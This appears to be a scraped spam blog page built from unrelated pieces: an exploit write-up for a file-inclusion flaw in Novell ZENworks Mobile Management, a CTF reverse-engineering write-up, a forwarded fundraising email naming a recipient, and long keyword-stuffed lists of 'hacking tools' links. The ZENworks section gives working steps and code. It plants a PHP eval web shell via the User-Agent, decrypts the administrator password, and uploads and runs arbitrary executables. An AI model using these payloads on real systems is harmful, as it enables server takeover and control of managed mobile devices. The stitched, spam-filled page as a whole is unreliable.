RSS feed - SEOClerks

Sunday, August 30, 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Related news


  1. Hack Tool Apk No Root
  2. Hacking Tools For Mac
  3. Install Pentest Tools Ubuntu
  4. Best Hacking Tools 2020
  5. New Hacker Tools
  6. Pentest Tools Kali Linux
  7. Usb Pentest Tools
  8. Hacker Tools For Ios
  9. Hack And Tools
  10. Hacker Tools Mac
  11. Pentest Tools Find Subdomains
  12. Hackrf Tools
  13. Hack Tool Apk
  14. Hacking Tools And Software
  15. Pentest Tools Apk
  16. Hacking Tools For Windows Free Download
  17. Hacking Tools 2019
  18. Hacker Tools Apk Download
  19. Hackers Toolbox
  20. Hack Tools Github
  21. Hacker Tools Free
  22. Hack Tools For Mac
  23. Hack Tools For Ubuntu
  24. Hacking Tools For Pc
  25. Free Pentest Tools For Windows
  26. Pentest Tools Linux
  27. Hacking Tools 2019
  28. Free Pentest Tools For Windows
  29. Hack Apps
  30. Tools 4 Hack
  31. Hacking Tools For Windows
  32. Hack Tools Online
  33. Pentest Tools Github
  34. Hacker Tools For Ios
  35. Hacking Tools And Software
  36. Pentest Tools Online
  37. Pentest Tools Windows
  38. Hacker Tools Windows
  39. Hacking Tools Usb
  40. Easy Hack Tools
  41. Pentest Tools Review
  42. Bluetooth Hacking Tools Kali
  43. Hacker Tools For Windows
  44. Hacker Hardware Tools
  45. Free Pentest Tools For Windows
  46. Hacker Search Tools
  47. New Hack Tools
  48. Hack And Tools
  49. Pentest Tools Tcp Port Scanner
  50. Hacking Tools Hardware
  51. Hacker Tools Free
  52. Pentest Tools For Android
  53. Best Hacking Tools 2020
  54. Best Hacking Tools 2019
  55. Hack Tool Apk No Root
  56. Hacker Tools Mac
  57. Best Hacking Tools 2020
  58. Pentest Tools Download
  59. Pentest Tools Find Subdomains
  60. Pentest Tools Port Scanner
  61. Growth Hacker Tools
  62. Hacker Tools For Mac
  63. Hack And Tools
  64. Hackrf Tools
  65. Hack Tools Online
  66. Hacking Tools Name
  67. Hack Rom Tools
  68. Hacker Tools 2019
  69. Beginner Hacker Tools
  70. Pentest Tools Url Fuzzer
  71. What Is Hacking Tools
  72. Hacker Tools Linux
  73. Pentest Tools Online
  74. Hack Tools Github
  75. Hack Tools Online
  76. Hack Tools Download
  77. Hack Tools For Games
  78. Pentest Tools List
  79. Hacker Tools For Mac
  80. Growth Hacker Tools
  81. Hacking Tools 2019
  82. Pentest Tools Linux
  83. Beginner Hacker Tools
  84. How To Hack
  85. Pentest Box Tools Download
  86. Hacking Tools And Software
  87. Hacker Hardware Tools
  88. Pentest Tools Url Fuzzer
  89. Hacking Tools Kit
  90. New Hacker Tools
  91. Hack Tools
  92. Best Pentesting Tools 2018
  93. Hacker Tools 2020
  94. Pentest Tools Linux
  95. Pentest Tools Github
  96. How To Make Hacking Tools
  97. How To Hack
  98. Hacker Tools For Mac
  99. Hacks And Tools
  100. Hacking Tools For Pc
  101. Hacking Tools 2020
  102. Github Hacking Tools
  103. Pentest Tools Bluekeep
  104. Hacker Tools 2019
  105. Pentest Tools Apk
  106. Termux Hacking Tools 2019

NcN 2015 CTF - theAnswer Writeup


1. Overview

Is an elf32 static and stripped binary, but the good news is that it was compiled with gcc and it will not have shitty runtimes and libs to fingerprint, just the libc ... and libprhrhead
This binary is writed by Ricardo J Rodrigez

When it's executed, it seems that is computing the flag:


But this process never ends .... let's see what strace say:


There is a thread deadlock, maybe the start point can be looking in IDA the xrefs of 0x403a85
Maybe we can think about an encrypted flag that is not decrypting because of the lock.

This can be solved in two ways:

  • static: understanding the cryptosystem and programming our own decryptor
  • dynamic: fixing the the binary and running it (hard: antidebug, futex, rands ...)


At first sight I thought that dynamic approach were quicker, but it turned more complex than the static approach.


2. Static approach

Crawling the xrefs to the futex, it is possible to locate the main:



With libc/libpthread function fingerprinting or a bit of manual work, we have the symbols, here is the main, where 255 threads are created and joined, when the threads end, the xor key is calculated and it calls the print_flag:



The code of the thread is passed to the libc_pthread_create, IDA recognize this area as data but can be selected as code and function.

This is the thread code decompiled, where we can observe two infinite loops for ptrace detection and preload (although is static) this antidebug/antihook are easy to detect at this point.


we have to observe the important thing, is the key random?? well, with the same seed the random sequence will be the same, then the key is "hidden" in the predictability of the random.

If the threads are not executed on the creation order, the key will be wrong because is xored with the th_id which is the identify of current thread.

The print_key function, do the xor between the key and the flag_cyphertext byte by byte.


And here we have the seed and the first bytes of the cypher-text:



With radare we can convert this to a c variable quickly:


And here is the flag cyphertext:


And with some radare magics, we have the c initialized array:


radare, is full featured :)

With a bit of rand() calibration here is the solution ...



The code:
https://github.com/NocONName/CTF_NcN2k15/blob/master/theAnswer/solution.c





3. The Dynamic Approach

First we have to patch the anti-debugs, on beginning of the thread there is two evident anti-debugs (well anti preload hook and anti ptrace debugging) the infinite loop also makes the anti-debug more evident:



There are also a third anti-debug, a bit more silent, if detects a debugger trough the first available descriptor, and here comes the fucking part, don't crash the execution, the execution continues but the seed is modified a bit, then the decryption key will not be ok.





Ok, the seed is incremented by one, this could be a normal program feature, but this is only triggered if the fileno(open("/","r")) > 3 this is a well known anti-debug, that also can be seen from a traced execution.

Ok, just one byte patch,  seed+=1  to  seed+=0,   (add eax, 1   to add eax, 0)

before:


after:



To patch the two infinite loops, just nop the two bytes of each jmp $-0



Ok, but repairing this binary is harder than building a decryptor, we need to fix more things:

  •  The sleep(randInt(1,3)) of the beginning of the thread to execute the threads in the correct order
  •  Modify the pthread_cond_wait to avoid the futex()
  • We also need to calibrate de rand() to get the key (just patch the sleep and add other rand() before the pthread_create loop
Adding the extra rand() can be done with a patch because from gdb is not possible to make a call rand() in this binary.

With this modifications, the binary will print the key by itself. 

More info

  1. Growth Hacker Tools
  2. Pentest Reporting Tools
  3. Hacking Tools Software
  4. Pentest Tools Alternative
  5. Hack Tools
  6. Pentest Tools Framework
  7. Hacking Tools Kit
  8. What Are Hacking Tools
  9. Tools 4 Hack
  10. Hacker Tools For Pc
  11. Pentest Tools Tcp Port Scanner
  12. Hacker Tools Online
  13. What Are Hacking Tools
  14. Hacking Tools
  15. What Are Hacking Tools
  16. Computer Hacker
  17. Hacker Tools Online
  18. Hack Tools Download
  19. Termux Hacking Tools 2019
  20. Hacking Tools For Games
  21. Hacking Tools Usb
  22. Hacking Tools For Windows
  23. Install Pentest Tools Ubuntu
  24. Hacker Hardware Tools
  25. Nsa Hack Tools
  26. Game Hacking
  27. Hacker Tools
  28. Hacker Tools Hardware
  29. Hacker Tools
  30. Hacking Tools For Windows Free Download
  31. Hack Tools 2019
  32. Hacking Tools Windows 10
  33. Hacking Tools For Kali Linux
  34. Hacker Techniques Tools And Incident Handling
  35. Github Hacking Tools
  36. Pentest Tools Github
  37. Android Hack Tools Github
  38. Hacker Tools Online
  39. Hacking Tools Hardware
  40. Beginner Hacker Tools
  41. Pentest Tools List
  42. Nsa Hack Tools Download
  43. Hack And Tools
  44. Free Pentest Tools For Windows
  45. Wifi Hacker Tools For Windows
  46. Hack App
  47. Ethical Hacker Tools
  48. Hacking Tools
  49. Hacking Tools Kit
  50. Hack And Tools
  51. Pentest Tools Review
  52. Hacking Tools 2019
  53. Hacker Security Tools
  54. Hack App
  55. Hacker Tools Apk
  56. Hacking Tools Online
  57. Hacking Tools Hardware

FWD: We need your help to make our Summer Annual Fund Drive a success.

Dear Tushar,
Did you see my email from earlier this week? I want to make sure you know our Summer Annual Fund Drive ends tomorrow night, August 31. When you join us today with your first gift, you'll help further our mission to lead the way to end Alzheimer's disease and all other dementia — by accelerating global research, driving risk reduction and early detection, and maximizing quality care and support.

Tushar, there's no better time to make your first gift in the fight to end Alzheimer's and all other dementia. Your generosity will fuel our work — especially vital as the COVID-19 crisis continues — year-round. Will you please join us before midnight tomorrow?

Donate Now

As always, thank you for being part of our community working so hard to end this disease.

Sincerely,
Donna McCullough
Chief Field and Development Officer

---------- Forwarded message ----------
From: Donna McCullough, Alzheimer's Association
Sent: Saturday, August 29, 2020
To: Tushar Hossain
Subject: We need your help to make our Summer Annual Fund Drive a success.
Hurry. You can be part of it with your donation now.
Alzheimer's Association DONATE NOW
Ends soon: Summer Annual Fund Drive
Dear Tushar,
August is drawing to a close — along with our Summer Annual Fund Drive. Can we count on you to join us in the fight to end Alzheimer's disease and all other dementia by making your first gift? By joining us today, you'll help us provide care and support, advance critical Alzheimer's disease research, and advocate for the more than 5 million Americans living with Alzheimer's.

2020 Alzheimer's Association Annual Fund
Tushar Hossain
Joined: 2020

Donate Now

We welcome you as part of our community dedicated to ending this devastating disease, a critical role made even more necessary as COVID-19 continues to disproportionally impact people living with Alzheimer's. With our voices combined, we can urge federal and state policymakers to improve the response to COVID-19 in long-term care facilities.

In addition to funding our 24/7 care and support programs and helping to accelerate vital research, your first gift to our Annual Fund Drive will support crucial advocacy efforts on behalf of families affected by Alzheimer's and all other dementia, including:
  • Working to ensure people living with younger-onset Alzheimer's and dementia have access to critical care and support services through the Older Americans Act, regardless of their age.
  • Urging state and federal lawmakers to implement policies that will enhance adequate testing, ensure access to the necessary equipment (i.e. PPE), implement necessary mandatory reporting, and develop protocols to respond to a rise in COVID-19 cases in long-term and residential care settings.
  • Advancing the federal government's commitment to Alzheimer's and dementia research, helping secure research funding increases that bring annual funding at the National Institutes of Health to $2.8 billion.
I hope you'll join us in our relentless pursuit of our vision of a world without Alzheimer's and all dementia. Please take part in our Summer Annual Fund Drive by making your first donation today. We need you to help further our mission to lead the way to end Alzheimer's and all other dementia — by accelerating global research, driving risk reduction and early detection, and maximizing quality care and support.

Sincerely,

Donna McCullough
Chief Field and Development Officer
Forward Facebook Twitter

P.S. Hurry — our Summer Annual Fund Drive ends at midnight on August 31. Please make your first gift now and take advantage of this important opportunity to advance our vital work year-round.

Donate Now
Your donation will strengthen our efforts to advance Alzheimer's care, support and research. From face-to-face support to online education programs and promising global research initiatives, your gift makes a difference in the lives of all those affected by Alzheimer's and other dementias in your community and across the world. Thank you for your continued support.

Alzheimer's Association Home Office, 225 N. Michigan Ave., Fl. 17, Chicago, IL 60601
© 2020 Alzheimer's Association. All rights reserved.
800.272.3900 | alz.org® | Donate

Please add info@alz.org to your address book to ensure you receive all future emails.
 
Having trouble reading this email?
View it in your browser
 
View your email preferences or unsubscribe.


W3AF

"W3AF is a Web Application Attack and Audit Framework. The project goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. This project is currently hosted at SourceForge." read more...

Read more


  1. Pentest Tools Bluekeep
  2. Blackhat Hacker Tools
  3. Pentest Tools Port Scanner
  4. Hacker Security Tools
  5. New Hack Tools
  6. Pentest Recon Tools
  7. Underground Hacker Sites
  8. Hacking Tools For Games
  9. Blackhat Hacker Tools
  10. Ethical Hacker Tools
  11. Pentest Tools Framework
  12. Hack Tool Apk No Root
  13. Pentest Tools Apk
  14. Hack Tools 2019
  15. Hack Tools For Games
  16. Pentest Tools Find Subdomains
  17. Hack Tool Apk No Root
  18. Hack Tools Github
  19. Hacking Tools For Windows 7
  20. Hacking Tools For Beginners
  21. Pentest Box Tools Download
  22. Pentest Tools Free
  23. Hack Tools For Games
  24. What Are Hacking Tools
  25. Pentest Tools For Mac
  26. Hacking Tools For Windows
  27. Hack Tools Download
  28. Hack Rom Tools
  29. Pentest Tools Kali Linux
  30. Hacker Tools Free Download
  31. Pentest Tools Github
  32. Hacker Search Tools
  33. Nsa Hacker Tools
  34. Hacker Tools
  35. Hacker Search Tools
  36. Hacks And Tools
  37. Hacking Tools Windows 10
  38. Pentest Tools Download
  39. Android Hack Tools Github
  40. Hacker Tools Hardware
  41. Pentest Tools Website Vulnerability
  42. Hack Tools Github
  43. Hack Tool Apk
  44. Nsa Hacker Tools
  45. Free Pentest Tools For Windows
  46. Hacking Tools And Software
  47. Hacking Tools Hardware
  48. Tools Used For Hacking
  49. Bluetooth Hacking Tools Kali
  50. Hack Tools 2019
  51. How To Make Hacking Tools
  52. Blackhat Hacker Tools
  53. Hacking Tools For Beginners
  54. Hacker Tools Free Download
  55. Hacking Tools Free Download
  56. Best Pentesting Tools 2018
  57. Pentest Tools Open Source
  58. What Are Hacking Tools
  59. Pentest Tools Website
  60. Blackhat Hacker Tools
  61. Hack Rom Tools
  62. Hacker Tools List
  63. Pentest Tools For Mac
  64. Nsa Hacker Tools
  65. Black Hat Hacker Tools
  66. Pentest Reporting Tools
  67. Hacking Tools And Software
  68. Top Pentest Tools
  69. Blackhat Hacker Tools
  70. Pentest Tools Linux
  71. Hacker Tools Apk Download
  72. Computer Hacker
  73. Hack Website Online Tool
  74. Pentest Tools Alternative
  75. Hacking Apps
  76. Android Hack Tools Github
  77. Ethical Hacker Tools
  78. Hacker
  79. Pentest Tools Website Vulnerability
  80. Hacker Tools 2020
  81. Hack And Tools
  82. Hack Tools Pc
  83. Hack Tool Apk No Root
  84. Hacking Tools For Games
  85. Hacker
  86. Pentest Tools Framework
  87. Best Hacking Tools 2019
  88. Hacker Tools List
  89. Hacking Tools For Windows 7
  90. Hacker Tools Windows
  91. Pentest Tools Kali Linux
  92. Hack Tools For Games
  93. Beginner Hacker Tools
  94. Hacker Techniques Tools And Incident Handling
  95. Hacker
  96. Install Pentest Tools Ubuntu
  97. Hacking Tools For Windows 7
  98. Pentest Tools Apk
  99. Pentest Tools Url Fuzzer
  100. Pentest Tools Framework
  101. Pentest Tools Apk
  102. Hack App
  103. Hack Tools For Games
  104. Pentest Tools Find Subdomains
  105. Beginner Hacker Tools
  106. Hack Tools Online
  107. Pentest Tools Tcp Port Scanner
  108. Hacker Tools Mac
  109. Pentest Automation Tools
  110. Hacker Security Tools
  111. Hacker Tools Hardware
  112. Pentest Tools Url Fuzzer
  113. Hack Website Online Tool
  114. Hacking Tools
  115. Hack Tools For Pc
  116. Hacker Tools Apk
  117. Hack Tool Apk No Root
  118. Hacker Tools Linux
  119. Hacking Tools Mac
  120. Hacker Tools For Windows
  121. Hacking Tools For Games
  122. Hacking Tools Free Download
  123. Hacker Tools Mac
  124. Hacker Hardware Tools
  125. Hacking Tools For Windows
  126. Hacker Tools For Mac
  127. Growth Hacker Tools
  128. Hacking Tools
  129. Hacking Tools For Windows Free Download
  130. Hacker Tools Apk Download
  131. Hacking Tools Pc
  132. Bluetooth Hacking Tools Kali
  133. Hacker Tools For Ios
  134. Pentest Tools For Ubuntu
  135. Hacker Search Tools
  136. Pentest Tools Open Source
  137. Pentest Tools Kali Linux
  138. Hackrf Tools
  139. Pentest Tools For Android
  140. Best Hacking Tools 2019
  141. How To Install Pentest Tools In Ubuntu
  142. Hacker Search Tools
  143. Hacking Tools Software
  144. Hacker Security Tools
  145. Hacking Tools Pc
  146. Hacking Tools Github
  147. Pentest Tools Tcp Port Scanner
  148. Tools Used For Hacking
  149. Pentest Automation Tools
  150. Hacker Tools List
  151. Hacker Tools Windows
  152. Hacker Tools 2020
  153. Hacker Tools For Windows
  154. Hacker Search Tools
  155. Tools Used For Hacking
  156. Hacking Tools Software
  157. Hacking App
  158. Pentest Tools Open Source
  159. Pentest Tools Website
  160. Hacker Tools Online
  161. Hacker Tool Kit
  162. Nsa Hack Tools
  163. Hacking Apps
  164. Nsa Hacker Tools
  165. Hackers Toolbox
  166. Hacker Tools Apk
  167. Blackhat Hacker Tools
  168. Hackers Toolbox